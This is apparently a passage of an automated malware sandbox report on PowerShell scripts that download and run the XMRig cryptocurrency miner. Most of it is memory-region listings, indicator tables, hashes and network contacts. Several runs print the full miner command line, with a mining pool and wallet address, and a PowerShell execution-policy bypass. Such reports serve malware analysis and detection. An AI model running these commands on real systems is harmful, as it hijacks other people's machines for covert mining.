memory/4256-108-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-109-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-110-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-111-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-112-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-113-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-114-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-115-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-116-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-117-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:41

Platform

win11-20240508-en

Max time kernel

1792s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4804-0-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uwp0y5hg.low.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4804-3-0x000001B9F20D0000-0x000001B9F20F2000-memory.dmp

memory/4804-10-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-11-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-12-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-14-0x000001B9F2370000-0x000001B9F2382000-memory.dmp

memory/4804-15-0x000001B9F2110000-0x000001B9F211A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2248-46-0x000001986EBE0000-0x000001986EC00000-memory.dmp

memory/2248-47-0x0000019902C40000-0x0000019902C60000-memory.dmp

memory/2248-48-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/4804-49-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/4804-50-0x00007FFB728F3000-0x00007FFB728F5000-memory.dmp

memory/2248-51-0x0000019903080000-0x00000199030A0000-memory.dmp

memory/2248-53-0x00000199032B0000-0x00000199032D0000-memory.dmp

memory/4804-52-0x00007FFB728F0000-0x00007FFB733B2000-memory.dmp

memory/2248-54-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-55-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-57-0x0000019903080000-0x00000199030A0000-memory.dmp

memory/2248-56-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-58-0x00000199032B0000-0x00000199032D0000-memory.dmp

memory/2248-59-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-60-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-61-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-62-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-63-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-64-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-65-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-66-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-67-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-68-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-69-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-70-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-71-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-72-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-73-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-74-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-75-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-76-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-77-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-78-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-79-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-80-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-81-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-82-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-83-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-84-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-85-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-86-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-87-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-88-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-89-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-90-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-91-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-92-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-93-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-94-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-95-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-96-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-97-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-98-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-99-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-100-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-101-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-102-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-103-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-104-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-105-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-106-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-107-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-108-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-109-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-110-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-111-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-112-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-113-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-114-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-115-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-116-0x00007FF701B60000-0x00007FF702793000-memory.dmp

memory/2248-117-0x00007FF701B60000-0x00007FF702793000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:15

Platform

win7-20240215-en

Max time kernel

1565s

Max time network

1567s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Network

N/A

Files

memory/2488-4-0x000007FEF5F6E000-0x000007FEF5F6F000-memory.dmp

memory/2488-6-0x0000000001E90000-0x0000000001E98000-memory.dmp

memory/2488-7-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-8-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2488-9-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-10-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-11-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

memory/2488-12-0x000007FEF5CB0000-0x000007FEF664D000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:19

Platform

win7-20231129-en

Max time kernel

1556s

Max time network

1556s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

memory/2340-4-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmp

memory/2340-5-0x000000001B690000-0x000000001B972000-memory.dmp

memory/2340-6-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2340-7-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-9-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-8-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-10-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-11-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

memory/2340-12-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:19

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/3296-0-0x00007FFE19733000-0x00007FFE19734000-memory.dmp

memory/3296-5-0x00000213E6410000-0x00000213E6432000-memory.dmp

memory/3296-8-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/3296-9-0x00000213E64C0000-0x00000213E6536000-memory.dmp

memory/3296-10-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fahehp2o.qba.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3296-25-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/3296-48-0x00000213E69B0000-0x00000213E69C2000-memory.dmp

memory/3296-61-0x00000213E6490000-0x00000213E649A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1940-90-0x000001DDB2E00000-0x000001DDB2E20000-memory.dmp

memory/1940-91-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/3296-92-0x00007FFE19733000-0x00007FFE19734000-memory.dmp

memory/3296-93-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp

memory/1940-94-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-95-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-96-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-97-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-98-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-99-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-100-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-101-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-102-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-103-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-104-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-105-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-106-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-107-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-108-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-109-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-110-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-111-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-112-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-113-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-114-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-115-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-116-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-117-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-118-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-119-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-120-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-121-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-122-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-123-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-124-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-125-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-126-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-127-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-128-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-129-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-130-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-131-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-132-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-133-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-134-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-135-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-136-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-137-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-138-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-139-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-140-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-141-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-142-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-143-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-144-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-145-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-146-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-147-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-148-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-149-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-150-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-151-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-152-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-153-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-154-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

memory/1940-155-0x00007FF6BD1A0000-0x00007FF6BDDD3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:23

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
